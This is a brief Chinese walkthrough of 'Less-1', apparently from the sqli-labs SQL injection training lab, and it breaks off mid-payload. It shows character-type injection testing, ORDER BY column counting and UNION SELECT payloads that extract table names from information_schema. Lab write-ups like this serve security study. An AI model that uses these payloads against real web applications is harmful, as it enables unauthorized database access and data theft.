Less-1 输入?id=1 输入1’，报错，存在注入 判断注入类型： 输入1 and 1=1和1 and 1=2页面都正常，不是数字型注入，输入1’ and ‘1’=’1页面正常，输入1’ and ‘1’=’2页面显示不同，确定为字符型注入 判断字段数： 当order by 4 出现报错，字段数为3（由于是字符型注入，不要忘记加注释符） 确定显示位： 使用联合查询注入，结果分别为2和3 获取当前数据库名和版本号： 数据库名为security，版本号为5.5.53 获取表名： ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+ 有四张表，同时有users表 获取列名： ?id=-1' union select 1,2,group_concat(column_name) from infor ...